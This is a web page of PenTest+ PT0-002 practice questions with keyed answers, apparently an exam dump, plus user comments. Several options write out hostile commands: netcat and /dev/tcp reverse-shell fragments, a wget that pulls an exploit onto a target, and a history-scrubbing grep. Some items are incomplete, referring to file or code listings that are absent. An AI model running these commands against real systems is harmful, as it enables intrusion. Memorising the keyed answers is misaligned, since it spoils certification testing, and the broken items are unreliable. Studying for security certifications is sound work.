Amazon
Avaya
Checkpoint
Cisco®
CompTIA
CrowdStrike
EC-Council
EXIN
Fortinet
Google
ISC
ISC2
ITIL®
Juniper
Microsoft
MuleSoft
Okta
Oracle
Palo Alto Networks
Salesforce
All Vendors
  1. Home
  2. CompTIA
  3. PT0-002

CompTIA PT0-002 Exam (page: 2)
CompTIA PenTest+ Certification
Updated on: 25-Aug-2025

Viewing Page 2 of 105
PT0-002 PDF 520 Questions

A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  1. Edit the discovered file with one line of code for remote callback.
  2. Download .pl files and look for usernames and passwords.
  3. Edit the smb.conf file and upload it to the server.
  4. Download the smb.conf file and look at configurations.

Answer(s): C



A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

  1. Whether sensitive client data is publicly accessible
  2. Whether the connection between the cloud and the client is secure
  3. Whether the client's employees are trained properly to use the platform
  4. Whether the cloud applications were developed using a secure SDLC

Answer(s): A



A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

  1. nc 10.10.51.50 9891 < exploit
  2. powershell -exec bypass -f \\10.10.51.50\9891
  3. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
  4. wget 10.10.51.50:9891/exploit

Answer(s): D



A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
Which of the following commands should the penetration tester run post-engagement?

  1. grep -v apache ~/bash_history > ~/.bash_history
  2. rm -rf /tmp/apache
  3. chmod 600 /tmp/apache
  4. taskkill /IM ג€apacheג€ /F

Answer(s): B



Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

  1. Executive summary of the penetration-testing methods used
  2. Bill of materials including supplies, subcontracts, and costs incurred during assessment
  3. Quantitative impact assessments given a successful software compromise
  4. Code context for instances of unsafe typecasting operations

Answer(s): D



Viewing Page 2 of 105



Share your comments for CompTIA PT0-002 exam with other users:

SAJI 7/20/2023 2:51:00 AM

56 question correct answer a,b
Anonymous


Summer 10/4/2023 9:57:00 PM

looking forward to the real exam
Anonymous